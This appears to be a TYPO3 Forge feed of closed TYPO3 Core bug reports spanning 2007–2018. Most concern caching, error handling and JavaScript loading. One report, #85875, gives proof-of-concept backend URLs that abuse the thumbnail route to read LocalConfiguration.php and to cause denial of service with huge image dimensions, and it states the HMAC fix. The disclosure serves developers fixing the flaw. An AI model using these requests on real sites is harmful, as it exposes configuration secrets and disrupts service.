TYPO3 Forge: Issues
http://forge.typo3.org/
Updated: 2018-11-14T08:50:52Z

TYPO3 Core - Bug #86923 (Closed): Symfony expressions/conditions doesn't work in user-tsconfig
http://forge.typo3.org/issues/86923
2018-11-14T08:50:52Z, Oliver Hader (oliver.hader@typo3.org)

TYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailController
http://forge.typo3.org/issues/85875
2018-08-16T18:33:06Z, Oliver Hader (oliver.hader@typo3.org)
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not released yet to 9.4.0 nor 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2>PoC</h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3>Information Disclosure</h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3>Denial of Service</h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>

TYPO3 Core - Bug #85773 (Closed): Flaws in sys_log entry IP anonymization
http://forge.typo3.org/issues/85773
2018-08-07T14:22:19Z, Oliver Hader (oliver.hader@typo3.org)
The sys_log entry IP anonymization has several flaws which lead to a revert of the initial change in master:
<ul>
<li>REMOTE_ADDR is anonymized, REMOTE_HOST not (probably there are more occurrences)</li>
<li>PHP method <code>sprintf()</code> is invoked with too many arguments, username information is out of bounds</li>
<li>introduced in <a class="external" href="https://review.typo3.org/#/c/57313/">https://review.typo3.org/#/c/57313/</a></li>
</ul>

TYPO3 Core - Bug #55246 (Closed): Class 'TYPO3\CMS\Recordlist\Browser\GeneralUtility' not found
http://forge.typo3.org/issues/55246
2014-01-22T14:37:05Z, Oliver Hader (oliver.hader@typo3.org)
<p><code>Class 'TYPO3\CMS\Recordlist\Browser\GeneralUtility' not found in typo3/branches/TYPO3_6-1/typo3/sysext/recordlist/Classes/Browser/ElementBrowser.php on line 704</code></p>

TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actions
http://forge.typo3.org/issues/46205
2013-03-12T15:30:34Z, Oliver Hader (oliver.hader@typo3.org)
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler and I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p>

TYPO3 Core - Bug #31249 (Closed): Caching tables of new extensions are not created
http://forge.typo3.org/issues/31249
2011-10-25T00:34:19Z, Oliver Hader (oliver.hader@typo3.org)
<p>Creating the caching tables of an extension that has been installed in the same process does not work.<br />Since the cachingConfiguration of the new extension is not forwarded to the cache manager, the new tables are just not known there.</p>

TYPO3 Core - Bug #23287 (Closed): Clearing caches in backend only displays empty frame
http://forge.typo3.org/issues/23287
2010-07-28T14:52:00Z, Oliver Hader (oliver.hader@typo3.org)
<p>Clearing caches in backend only displays empty frame - applies for the typo3conf and the frontend cache.</p>
<p>(issue imported from #M15263)</p>

TYPO3 Core - Bug #21168 (Closed): Improve the error and exception handling
http://forge.typo3.org/issues/21168
2009-10-01T14:24:37Z, Oliver Hader (oliver.hader@typo3.org)
<p>Problem:<br />The new error handling in TYPO3 is way too inflexible.<br />- Errors are "converted" to exceptions. This is not very useful because every PHP warning will be turned into an exception and will stop the script execution.<br />- Displayed errors break the backend layout and make forms unusable<br />- Errors and exceptions are only displayed, but there's no built-in possibility to write errors and exceptions to a log.</p>
<p>Solution(s):<br />- introduce a new parameter for errors which should be handled by the error handler. The already existing parameter "exceptionalErrors" is used only for the error which should throw exceptions.<br />- Display the errors as flashmessages in the BE and as TsLog messages in FE (in the adminpanel)<br />- implement logging of errors and exceptions to the different logging systems TYPO3</p>
<p>Documentation:<br /><a class="external" href="http://wiki.typo3.org/index.php/File:Error_and_exception_handling.odt">http://wiki.typo3.org/index.php/File:Error_and_exception_handling.odt</a></p>
<p>(issue imported from #M12093)</p>

TYPO3 Core - Bug #21078 (Closed): Optimize disposal of t3lib_PageRenderer
http://forge.typo3.org/issues/21078
2009-09-17T17:08:41Z, Oliver Hader (oliver.hader@typo3.org)
<p>t3lib_PageRenderer is currently used in the TYPO3 backend and frontend. There the classes template and tslib_fe inherit from t3lib_PageRenderer. However, in frontend disposal it's not required to have the feature set of the page renderer loaded if a request gets served by the cache and nothing is rendered at all.</p>
<p>Thus, instead of using "tslib_fe extends t3lib_PageRenderer", an aggregation shall be used.<br />Extensions can then access the page renderer e.g. by $TSFE->getPageRenderer()->addJsFile()</p>
<p>(issue imported from #M11985)</p>

TYPO3 Core - Bug #19530 (Closed): Store OpenID information in database instead of using the files...
http://forge.typo3.org/issues/19530
2008-10-30T11:11:28Z, Oliver Hader (oliver.hader@typo3.org)
<p>The OpenID information currently gets stored in the filesystem. Due to security reasons it's preferred to have that sensitive data in the database.</p>
<p>The file to be changed is class.tx_openid_sv1.php</p>
<p>(issue imported from #M9683)</p>

TYPO3 Core - Bug #19496 (Closed): Flexform sections are not working anymore since script.aculo.us...
http://forge.typo3.org/issues/19496
2008-10-22T16:41:47Z, Oliver Hader (oliver.hader@typo3.org)
<p>Due to a change of loading JavaScript resources between TYPO3 4.2.1 and 4.2.2 the script.aculo.us JavaScript framework now only gets loaded when it is required (before it was always loaded).</p>
<p>The solution is to explicitly load script.aculo.us when flexform sections are being rendered.</p>
<p>(issue imported from #M9623)</p>

TYPO3 Core - Bug #19485 (Closed): Frontend Editing does not work anymore
http://forge.typo3.org/issues/19485
2008-10-21T10:51:06Z, Oliver Hader (oliver.hader@typo3.org)
<p>Due to a change of loading JavaScript libraries in the back-end by a common handler function, the front-end editing does not work anymore and shows the following PHP error:</p>
<p>Fatal error: Call to undefined method stdClass::loadJavascriptLib() in t3lib/class.t3lib_tceforms.php on line 5079</p>
<p>(issue imported from #M9608)</p>

TYPO3 Core - Feature #17500 (Closed): Localization of child records
http://forge.typo3.org/issues/17500
2007-08-06T20:58:11Z, Oliver Hader (oliver.hader@typo3.org)
<p>The localization of child records when viewing the parent record isn't possible. This is a missing feature of TYPO3 4.1.</p>
<p>(issue imported from #M6087)</p>

TYPO3 Core - Bug #17001 (Closed): config.linkVars check doesn't allow negative ranges
http://forge.typo3.org/issues/17001
2007-02-17T11:05:42Z, Oliver Hader (oliver.hader@typo3.org)
<p>The newly introduced linkVars check in TYPO3 4.1 doesn't allow negative ranges.</p>
<p>Example:<br />config.linkVars = my_variable(1-5) is valid<br />config.linkVars = my_variable(-1-5) doesn't work<br />config.linkVars = my_variable(-1--3) doesn't work and looks very ugly</p>
<p>I suggest to use ".." as delimiter, e.g.<br />config.linkVars = my_variable(-1..-3)</p>
<p>Possibly it is allowed in TYPO3 4.2 to use config.linkVars = tx_myext_pi1[var](-1..-3), but we should change the delimiter from "-" to ".." now.<br />(issue imported from #M5009)</p>

TYPO3 Core - Bug #16875 (Closed): Wrong character encoding in new child records created via AJAX ...
http://forge.typo3.org/issues/16875
2007-01-21T15:05:47Z, Oliver Hader (oliver.hader@typo3.org)
<p>If a new child record was created dynamically using an AJAX call, umlauts like "äöüß" were not displayed correctly due to a missing character encoding.</p>
<p>(issue imported from #M4820)</p>